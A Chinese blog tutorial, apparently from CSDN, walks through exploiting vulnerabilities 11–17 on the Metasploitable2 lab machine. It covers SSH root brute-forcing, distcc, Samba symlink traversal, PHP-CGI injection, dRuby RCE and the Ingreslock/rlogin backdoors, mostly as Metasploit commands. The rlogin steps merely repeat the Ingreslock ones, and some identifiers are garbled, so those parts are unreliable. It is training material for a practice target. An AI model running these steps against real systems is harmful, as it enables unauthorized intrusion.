Metasploitable2 靶机漏洞(下)

最新推荐文章于 2023-03-11 15:52:47 发布
最新推荐文章于 2023-03-11 15:52:47 发布
阅读量4.6k 收藏 36
点赞数 2
分类专栏: # 信安文章
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fly_hps/article/details/89763364
版权

11、Root用户弱口令漏洞(SSH爆破)

安全组织索引

CVE:无

OSVDB:无

BID:无

原理

靶机root用户存在弱口令漏洞,在使用指南里并没有指出。

影响系统/软件

Linux

使用工具

Metasploit

利用步骤

1.输入nmap –sV  -O 192.168.160.131 查看SSh端口是否开启

  1. 开启metasploit framework 框架,依次输入:

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.160.131

set USERNAME root

set PASS_FILE  pass.txt(字典文件,需要预先生成)

set THREADS 50

run

12、Distcc后门漏洞

安全组织索引

CVE:CVE=2004-2687

BID:

OSVDB:OSVDB-13378

原理

Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,改漏洞是XCode 1.5 版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制。

参考链接如下:

影响系统/软件

Distcc 2.x

使用工具

Kali , metasploit

利用步骤

  1. 在kali中执行msfconsole,启动metasploit
  2. msf>use exploit/unix/misc/distcc_exec,选择漏洞
  3. set RHOST 192.168.160.131
  4. exploit,开启攻击
  5. 利用成功执行id查看权限,uname –a 验证服务器信息

13、Samba sysmlink 默认配置目录遍历漏洞

安全组织索引

CVE:CVE-2010-0926

BID:33598

OSVDB:OSVDB-62145

原理

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的Samba默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含的目录遍历符的软链接,可以进行目录遍历以及访问任意文件

参考链接如下:

影响系统/软件

before 3.3.11 , 3.4.x     before 3.4.6, and 3.5.x before 3.5.orc3

使用工具

Kali ,metasploit

利用步骤

  1. 在kali中执行msfconsole,启动metasploit
  2. use auxiliary/admin/smb/samba_symlink_traversal
  3. set RHOST 192.168.160.131 ,设置要攻击的机器IP
  4. msf auxiliary(samba_symlink_traversal)>ser SMBSHARE tmp 设置SAM可写文件
  5. exploit ,开始攻击
  6. root@kali:~#smbclient //192.168.160.131/tmp 在新窗口下执行smbclient 命令打开上面生成的共享目录
  7. smb:\>cd rootfs 进入rootfs目录
  8. smb:\rootfs>ls  执行ls命令列出目录
  9. smb:\rootfs\>more /etc/password  列出密码文件,利用成功。

14、PHP CGI参数注入执行漏洞

安全组织索引

CVE:cve-2012-1823

BID:

OSVDB:OSVDB-81633

原理

CGI脚本没正确的处理请求参数,导致源代码泄漏,运行远程攻击者在请求参数中插入执行命令。

参考链接如下:

影响系统/软件

Before 5.3.12 and 5.4.x before 5.4.2

使用工具

Kali ,Metasploit

利用步骤

  1. 在kali中执行msfconsole,启动metasploit
  2. Msf>use exploit/multi/http/php_cgi_arg_injection,选择漏洞
  3. set RHOST 192.168.160.131 ,设置要攻击的IP
  4. exploit,开始攻击
  5. meterpreter>ls 获得meterpreter,可执行ls列出目录确认

15、Druby远程代码执行漏洞

安全组织索引

CVE:CVE-2013-0156(类似)

BID:

OSVDB:

原理

Druby配置不当,被滥用执行命令(Distributed Ruby or D Rb allows Ruby programs to communicate with each other on the same machine or over a network. DRb uses remote method invocation(RMI) to pass commands and data between processes )

参考链接如下

影响系统/软件

 Ruby 1.8

使用工具

Kali ,metasploit

利用步骤

  1. root@kali:~# nmap –p 0-65535 –sS  -sV 192.168.160.131 namp扫描对应端口及端口应用(或者nmap –bqv 192.168.160.131)
  2. 在kali中执行msfconsole,启动metasploit
  3. 发现8787 druby端口
  4. Msf>serach drb 搜索dbr 相关漏洞
  5. Msf>use exploit/linux/misc/drb_remote_codeexec 使用漏洞
  6. set URI druby:192.168.160.131 ,设置要攻击的机器的druby链接
  7. exploit ,开启攻击
  8. 输入id,uname –a确认

16、Ingreslock 后门漏洞

安全组织索引

CVE:

BID:

OSVDB:

原理

Ingreslock后门程序监听在1524端口,链接到1524端口就可以直接获得root权限。

影响系统/软件

使用工具

Kali

利用步骤

  1. 在kali中执行telnet 192.168.160.131 1524
  2. 获得root权限
  3. 执行uname –a 验证

17、Rlogin 后门漏洞

安全组织索引

CVE:

BID:

OSVDB:

原理

TCP端口512,513和514为著名的rlogin提供服务。在系统之后被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts+)。要利用这个配置,确保rsh客户端已经按照(在linux操作系统上安装Open ssh),然后以root权限允许下列命令,如果被提示需要一个SSH秘钥,这表示RSH客户端没有安装,ubuntu一般默认使用SSH(Debin GNU/Linux 也是如此)

影响系统/软件

Linux

使用工具

Kali

利用步骤

  1. 在kali中执行命令行 telnet 192.168.160.131 1524
  2. 获得root权限
  3. 执行uname –a 验证

 

 

FLy_鹏程万里
关注
  • 2
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
Metasploitable2靶机之第七篇--Distcc后门漏洞
千寻的博客
04-02 1642
文章目录环境原理漏洞利用第一步 ,启动metasploit第二步选择漏洞库第三步 设置参数,开始攻击第四步 利用成功,执行验证摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 Distcc用于大量代码在网络服务器上的分布式编译, 但是如果配置不严格,容易被滥用执行命令, 该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制 漏洞利用 第一步
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 2518
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 3727
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
metasploitable2
胡铁威的博客
06-17 1096
nmap使用 nmap –sP IP段/掩码 范围内ping通的所有主机,通过抓包只看到发了arp包,还没有找全局域网内所有主机。 nmap -sP 192.168.43.0/24-PS 让nmap使用SYN包而不是ACK包来对目标主机进行扫描。抓包没有看到syn包,不知道为什么 nmap -sP -PS 192.168.43.0/24 可以比-sP多找到主机-sV 探测打开端口对应服务的版本信息 nmap -sV -Pn IP 扫描目标IP所有开放端口,列出应用版本 nmap -sV
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 1679
Metasploitable2靶机漏洞发现与渗透测试
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
Metasploitable3靶机
05-09
Metasploitable3是一个win2008的靶机---...Metasploitable正对Metasploitable2改变了很多,里面很多漏洞都是需要自己挖掘的,可以更适应现在社会上的模拟让网安更容易学习 让网安人员更好的磨练自己的技能
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只...
metasploitable 2
YUKIDDDD的博客
08-05 1353
metasploitable 21.介绍2.信息收集3.漏洞利用 1.介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 2.信息收集 nmap -sC -sV -p1-65535 192.168
Metasploitable2的相关介绍
qq_43348375的博客
03-06 617
Metasploitable2是什么? Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。 下载地址 以前提供的下载地址已经无法前往了,在这里推荐另一个地址: https://sourceforge.mirrorservice.org/m/me/metasploitable
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
metasploitable2靶机
雨泽网络工作室
08-16 4581
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
kali渗透metasploitable靶机
weixin_30911809的博客
05-28 699
kali渗透metasploitable靶机 为了证明我还活着,今天就记录一下。我是怎样渗透到目标机器的,我是菜鸟。。。。。 Windows下载链接:http://dev.modern.ie/tools/vms/ 靶机下载链接:http://downloads.metasploit.com/data/metasploitable/metas...
node-v5.11.0-x86.msi
05-07
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
41532698775097Facebook Lite_405.0.0.8.113_apkcombo.com.armeabi-v7a.apk
05-07
41532698775097Facebook Lite_405.0.0.8.113_apkcombo.com.armeabi-v7a.apk
2024-2030中国RDF制粒机市场现状研究分析与发展前景预测报告.docx
05-07
2024-2030中国RDF制粒机市场现状研究分析与发展前景预测报告
财务困境-RLPM模型.xlsx
最新发布
05-07
详细介绍及样例数据:https://blog.csdn.net/li514006030/article/details/138549562
metasploitable2靶机安装
03-16
Metasploitable2是一款用于漏洞测试和渗透测试的虚拟机,它包含了许多已知的漏洞和弱点,可以用于测试安全工具和技术的有效性。安装Metasploitable2需要先下载虚拟机镜像文件,然后使用虚拟化软件(如VMware、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值